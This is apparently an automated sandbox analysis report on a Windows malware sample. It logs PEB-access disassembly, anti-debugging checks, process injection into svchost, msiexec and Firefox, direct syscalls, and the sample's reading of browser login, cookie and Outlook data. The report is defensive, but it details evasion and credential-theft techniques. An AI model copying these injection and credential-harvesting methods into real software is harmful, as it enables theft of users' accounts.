            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436B70 mov eax, dword ptr fs:[00000030h]1_2_03436B70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436B70 mov eax, dword ptr fs:[00000030h]1_2_03436B70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504B67 mov eax, dword ptr fs:[00000030h]1_2_03504B67
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E6B77 mov eax, dword ptr fs:[00000030h]1_2_034E6B77
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464B79 mov eax, dword ptr fs:[00000030h]1_2_03464B79
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438B10 mov eax, dword ptr fs:[00000030h]1_2_03438B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438B10 mov eax, dword ptr fs:[00000030h]1_2_03438B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438B10 mov eax, dword ptr fs:[00000030h]1_2_03438B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440B10 mov eax, dword ptr fs:[00000030h]1_2_03440B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440B10 mov eax, dword ptr fs:[00000030h]1_2_03440B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440B10 mov eax, dword ptr fs:[00000030h]1_2_03440B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440B10 mov eax, dword ptr fs:[00000030h]1_2_03440B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB1C mov eax, dword ptr fs:[00000030h]1_2_0345EB1C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342CB1E mov eax, dword ptr fs:[00000030h]1_2_0342CB1E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CB20 mov eax, dword ptr fs:[00000030h]1_2_0346CB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCB20 mov eax, dword ptr fs:[00000030h]1_2_034BCB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCB20 mov eax, dword ptr fs:[00000030h]1_2_034BCB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCB20 mov eax, dword ptr fs:[00000030h]1_2_034BCB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342EBC0 mov eax, dword ptr fs:[00000030h]1_2_0342EBC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4BC0 mov eax, dword ptr fs:[00000030h]1_2_034B4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4BC0 mov eax, dword ptr fs:[00000030h]1_2_034B4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4BC0 mov eax, dword ptr fs:[00000030h]1_2_034B4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4BC0 mov eax, dword ptr fs:[00000030h]1_2_034B4BC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D6BDE mov ebx, dword ptr fs:[00000030h]1_2_034D6BDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D6BDE mov eax, dword ptr fs:[00000030h]1_2_034D6BDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458BD1 mov eax, dword ptr fs:[00000030h]1_2_03458BD1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458BD1 mov eax, dword ptr fs:[00000030h]1_2_03458BD1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504BE0 mov eax, dword ptr fs:[00000030h]1_2_03504BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8BBE mov eax, dword ptr fs:[00000030h]1_2_034F8BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8BBE mov eax, dword ptr fs:[00000030h]1_2_034F8BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8BBE mov eax, dword ptr fs:[00000030h]1_2_034F8BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8BBE mov eax, dword ptr fs:[00000030h]1_2_034F8BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA40 mov eax, dword ptr fs:[00000030h]1_2_0345EA40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA40 mov eax, dword ptr fs:[00000030h]1_2_0345EA40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034CAA40 mov eax, dword ptr fs:[00000030h]1_2_034CAA40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034CAA40 mov eax, dword ptr fs:[00000030h]1_2_034CAA40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4A57 mov eax, dword ptr fs:[00000030h]1_2_034B4A57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4A57 mov eax, dword ptr fs:[00000030h]1_2_034B4A57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AA0E mov eax, dword ptr fs:[00000030h]1_2_0346AA0E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AA0E mov eax, dword ptr fs:[00000030h]1_2_0346AA0E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440ACE mov eax, dword ptr fs:[00000030h]1_2_03440ACE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440ACE mov eax, dword ptr fs:[00000030h]1_2_03440ACE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4AC2 mov eax, dword ptr fs:[00000030h]1_2_034D4AC2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D0AE0 mov eax, dword ptr fs:[00000030h]1_2_034D0AE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2AE0 mov eax, dword ptr fs:[00000030h]1_2_034D2AE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2AE0 mov eax, dword ptr fs:[00000030h]1_2_034D2AE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450AEB mov eax, dword ptr fs:[00000030h]1_2_03450AEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450AEB mov eax, dword ptr fs:[00000030h]1_2_03450AEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450AEB mov eax, dword ptr fs:[00000030h]1_2_03450AEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AED mov eax, dword ptr fs:[00000030h]1_2_03430AED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AED mov eax, dword ptr fs:[00000030h]1_2_03430AED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AED mov eax, dword ptr fs:[00000030h]1_2_03430AED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0AFF mov eax, dword ptr fs:[00000030h]1_2_034B0AFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0AFF mov eax, dword ptr fs:[00000030h]1_2_034B0AFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0AFF mov eax, dword ptr fs:[00000030h]1_2_034B0AFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504AE8 mov eax, dword ptr fs:[00000030h]1_2_03504AE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E6A80 mov eax, dword ptr fs:[00000030h]1_2_034E6A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C944 mov eax, dword ptr fs:[00000030h]1_2_0346C944
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E94E mov eax, dword ptr fs:[00000030h]1_2_0345E94E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454955 mov eax, dword ptr fs:[00000030h]1_2_03454955
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454955 mov eax, dword ptr fs:[00000030h]1_2_03454955
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C958 mov eax, dword ptr fs:[00000030h]1_2_0346C958
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344096B mov eax, dword ptr fs:[00000030h]1_2_0344096B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344096B mov eax, dword ptr fs:[00000030h]1_2_0344096B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436970 mov eax, dword ptr fs:[00000030h]1_2_03436970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486912 mov eax, dword ptr fs:[00000030h]1_2_03486912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462919 mov eax, dword ptr fs:[00000030h]1_2_03462919
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462919 mov eax, dword ptr fs:[00000030h]1_2_03462919
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F892E mov eax, dword ptr fs:[00000030h]1_2_034F892E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F892E mov eax, dword ptr fs:[00000030h]1_2_034F892E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC920 mov ecx, dword ptr fs:[00000030h]1_2_034AC920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC920 mov eax, dword ptr fs:[00000030h]1_2_034AC920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC920 mov eax, dword ptr fs:[00000030h]1_2_034AC920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC920 mov eax, dword ptr fs:[00000030h]1_2_034AC920
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_00426DA1 CreateFileW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0042202E SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_004230F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_00417D93 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtCreateFile: Direct from: 0x771C2F0C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtSetInformationThread: Direct from: 0x771B6319
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtQueryVolumeInformationFile: Direct from: 0x771C2E4C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtDeviceIoControlFile: Direct from: 0x771C2A0C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtAllocateVirtualMemory: Direct from: 0x771C2B0C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtOpenSection: Direct from: 0x771C2D2C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtQuerySystemInformation: Direct from: 0x771C47EC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtClose: Direct from: 0x771C2A8C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtCreateKey: Direct from: 0x771C2B8C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtSetInformationThread: Direct from: 0x771C2A6C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtQueryAttributesFile: Direct from: 0x771C2D8C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtAllocateVirtualMemory: Direct from: 0x771C480C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtQueryInformationProcess: Direct from: 0x771C2B46
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtResumeThread: Direct from: 0x771C2EDC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtCreateUserProcess: Direct from: 0x771C363C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtWriteVirtualMemory: Direct from: 0x771C482C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtProtectVirtualMemory: Direct from: 0x771C2EBC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtDelayExecution: Direct from: 0x771C2CFC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtOpenKeyEx: Direct from: 0x771C2ABC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtResumeThread: Direct from: 0x771C35CC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtAllocateVirtualMemory: Direct from: 0x771C2B1C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtReadFile: Direct from: 0x771C29FC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtQuerySystemInformation: Direct from: 0x771C2D1C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtUnmapViewOfSection: Direct from: 0x771C2C5C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtNotifyChangeKey: Direct from: 0x771C3B4C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtWriteVirtualMemory: Direct from: 0x771C2D5C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtMapViewOfSection: Direct from: 0x771C2C3C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtSetInformationProcess: Direct from: 0x771C2B7C
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtReadVirtualMemory: Direct from: 0x771C2DAC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtOpenFile: Direct from: 0x771C2CEC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtQueryInformationToken: Direct from: 0x771C2BCC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtAllocateVirtualMemory: Direct from: 0x771C3BBC
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe NtTerminateThread: Direct from: 0x771C2EEC
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe protection: read write
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exe Thread register set: target process: 7304
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2995008
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0043916A LogonUserW
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_00436431 mouse_event,mouse_event
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4rsJEIb7k.exe"
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: p4rsJEIb7k.exe, BlltrVxNMs.exe, 00000002.00000002.9380853166.0000000001C40000.00000002.00000001.00040000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000000.4737047660.0000000001C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: BlltrVxNMs.exe, 00000002.00000002.9380853166.0000000001C40000.00000002.00000001.00040000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000000.4737047660.0000000001C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: p4rsJEIb7k.exe Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: BlltrVxNMs.exe, 00000002.00000002.9380853166.0000000001C40000.00000002.00000001.00040000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000000.4737047660.0000000001C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: BlltrVxNMs.exe, 00000002.00000002.9380853166.0000000001C40000.00000002.00000001.00040000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000000.4737047660.0000000001C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: yProgram ManagerF-
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_00410D10 cpuid
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_004711D2 GetUserNameW
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0042039F GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\msiexec.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: p4rsJEIb7k.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: p4rsJEIb7k.exe Binary or memory string: WIN_XP
            Source: p4rsJEIb7k.exe Binary or memory string: WIN_XPe
            Source: p4rsJEIb7k.exe Binary or memory string: WIN_VISTA
            Source: p4rsJEIb7k.exe Binary or memory string: WIN_7

            Remote Access Functionality

            Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
